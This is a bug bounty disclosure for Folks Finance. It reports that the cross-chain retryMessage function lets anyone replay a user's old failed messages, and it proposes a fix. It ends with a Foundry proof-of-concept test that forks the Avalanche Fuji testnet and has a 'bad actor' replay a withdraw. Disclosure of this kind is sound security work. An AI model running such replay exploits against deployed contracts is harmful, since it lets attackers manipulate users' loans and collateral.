Boost _ Folks Finance 34150 - [Smart Contract - Low] Failed messages never expire and can be replayed by anyone potentially allowing users to be griefed
Submitted on Tue Aug 06 2024 02:16:38 GMT-0400 (Atlantic Standard Time) by @JCN2023 for Boost | Folks Finance
127: function retryMessage(uint16 adapterId, bytes32 messageId) external payable {
128: // get failed message if known
129: Messages.MessageReceived memory message = _getFailedMessage(adapterId, messageId);
131: // convert handler to address type (from lower 20 bytes)
132: address handler = Messages.convertGenericAddressToEVMAddress(message.handler);
140: // clear failure before call to handler
141: delete failedMessages[adapterId][message.messageId];
143: // call handler with received payload
144: try BridgeMessenger(handler).receiveMessage(message) {
145: // emit message retry as suceeded
146: emit MessageRetrySucceeded(adapterId, message.messageId);
147: } catch (bytes memory err) {
148: // store and emit message retry as failed
149: failedMessages[adapterId][message.messageId] = message;
150: emit MessageRetryFailed(adapterId, message.messageId, err);
As we can see above, the msg.sender of the retryMessage transactions is not validated. Therefore, anyone is able to retry a failed message at anytime.
Bad actors can retry user's old, failed messages. This will allow the user's loan to potentially be manipulated without their knowledge. For example, an old withdraw or borrow transaction can be retried, forcing the user to redeposit their collateral or repay their unexpected borrow position. Failed messages would likely be a result of user error, but can also be temporal (cap reached). In these cases, users may opt to simply submit a new transaction with more optimal arguments in order to have a successful tx.
The conditions of this exploit requires users to have old failed messages that were never retried. Additionally, the failed message is not guaranteed to succeed at any future time. Based on these pre-conditions, I have chosen to mark the severity of this report as low.
Recommended Mitigation
I would recommend decoding the message.payload during the retryMessage transaction and validating that the msg.sender is an authorized address for the accountId of the message.
Proof of concept
Proof of Concept
To run foundry POC:
add test file to test/ directory of a foundry repo
add AVAX_FUJI_RPC_URL variable as environment var or in .env file
run test with forge test --mc FolksPOC_GriefUserByFailedTransaction
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.13;
import {Test, console} from "forge-std/Test.sol";
interface IERC20 {
function balanceOf(address owner) external view returns (uint256);
function approve(address spender, uint256 amount) external returns (bool);
interface IHUB {
function loanManager() external view returns (address);
interface IHubAdapter {
function sequence() external view returns (uint256);
interface ISpoke {
struct MessageParams {
uint16 adapterId;
uint16 returnAdapterId;
uint256 receiverValue;
uint256 gasLimit;
uint256 returnGasLimit;
function deposit(MessageParams memory params, bytes32 accountId, bytes32 loanId, uint256 amount) external payable;
function createAccount(MessageParams memory params, bytes32 accountId, bytes32 refAccountId) external payable;
function createLoan(MessageParams memory params, bytes32 accountId, bytes32 loanId, uint16 loanTypeId, bytes32 loanName) external payable;
function withdraw(MessageParams memory params, bytes32 accountId, bytes32 loanId, uint8 poolId, uint16 chainId, uint256 amount, bool isFAmount) external payable;
interface ILoanManager {
struct UserLoanCollateral {
uint256 balance;
uint256 rewardIndex;
struct UserLoanBorrow {
uint256 amount;
uint256 balance;
uint256 lastInterestIndex;
uint256 stableInterestRate;
uint256 lastStableUpdateTimestamp;
uint256 rewardIndex;
function getUserLoan(bytes32 loanId) external view returns (
uint8[] memory,
uint8[] memory,
UserLoanCollateral[] memory,
UserLoanBorrow[] memory
interface IBridgeRouter {
function retryMessage(uint16 adapterId, bytes32 messageId) external payable;
contract FolksPOC_GriefUserByFailedTransaction is Test {
uint256 avaxTestnetFork;
string AVAX_FUJI_RPC_URL = vm.envString("AVAX_FUJI_RPC_URL");
address constant USDC = 0x5425890298aed601595a70AB815c96711a31Bc65;
address constant HUB_ADAPTER = 0xf472ab58969709De9FfEFaeFFd24F9e90cf8DbF9;
address constant HUB = 0xaE4C62510F4d930a5C8796dbfB8C4Bc7b9B62140;
address constant SPOKE_COMMON = 0x6628cE08b54e9C8358bE94f716D93AdDcca45b00;
address constant SPOKE_CIRCLE_TOKEN = 0x89df7db4af48Ec7A84DE09F755ade9AF1940420b;
address BRIDGE_ROUTER = 0xa9491a1f4f058832e5742b76eE3f1F1fD7bb6837;
event MessageFailed(uint16 adapterId, bytes32 indexed messageId, bytes reason);
function setUp() public {
avaxTestnetFork = vm.createFork(AVAX_FUJI_RPC_URL);
function testGriefUserWithFailedMessages() public {
// Note: test below done to demonstrate scenario in which a user has a forgotten failed transaction
// that is retried again in the future by a bad actor and as a result the user is griefed
// set up bad actor
address badActor = address(0x69420);
// set up user account and loan
address user = address(0x1111);
deal(USDC, user, 200e6);
ISpoke.MessageParams memory params = ISpoke.MessageParams({
adapterId: 1,
returnAdapterId: 1,
receiverValue: 0,
gasLimit: 0,
returnGasLimit: 0
bytes32 accountId = keccak256(abi.encodePacked(user));
bytes32 loanId = keccak256(abi.encodePacked(user, accountId));
ISpoke(SPOKE_COMMON).createAccount(params, accountId, bytes32(0));
ISpoke(SPOKE_COMMON).createLoan(params, accountId, loanId, uint16(2), bytes32(0));
// user deposits collateral
IERC20(USDC).approve(SPOKE_CIRCLE_TOKEN, 100e6);
ISpoke(SPOKE_CIRCLE_TOKEN).deposit(params, accountId, loanId, 100e6);
ILoanManager loanManager = ILoanManager(IHUB(HUB).loanManager());
ILoanManager.UserLoanCollateral[] memory collaterals;
(, , , , collaterals, ) = ILoanManager(loanManager).getUserLoan(loanId);
uint256 fTokensReceived = collaterals[0].balance;
// user attempts to withdraw, but message fails
// for sake of testing we will force a failed message via withdrawing too much
bytes32 messageId = keccak256(abi.encodePacked(bytes32("HUB_ADAPTER_V1"), IHubAdapter(HUB_ADAPTER).sequence()));
bytes memory reason = abi.encodeWithSelector(bytes4(keccak256("Panic(uint256)")), uint256(0x11)); // underflow, withdrawing too much
vm.expectEmit(true, false, false, true); // indicates message failed
emit MessageFailed(
ISpoke(SPOKE_COMMON).withdraw(params, accountId, loanId, 128, 1, 101e6, false);
// user submits a new withdraw transaction to withdraw all funds
ISpoke(SPOKE_COMMON).withdraw(params, accountId, loanId, 128, 1, fTokensReceived, true);
// time passes and user deposits more
uint256 userBal = IERC20(USDC).balanceOf(user);
IERC20(USDC).approve(SPOKE_CIRCLE_TOKEN, userBal);
ISpoke(SPOKE_CIRCLE_TOKEN).deposit(params, accountId, loanId, userBal);
(, , , , collaterals, ) = ILoanManager(loanManager).getUserLoan(loanId);
uint256 userCollateralBalanceBefore = collaterals[0].balance;
// bad actor retries user's old, failed `withdraw` transaction
IBridgeRouter(BRIDGE_ROUTER).retryMessage(params.adapterId, messageId);
// validate bad actor has withdrawn user collateral on their behalf
(, , , , collaterals, ) = ILoanManager(loanManager).getUserLoan(loanId);
uint256 userCollateralBalanceAfter = collaterals[0].balance;
assertLt(userCollateralBalanceAfter, userCollateralBalanceBefore);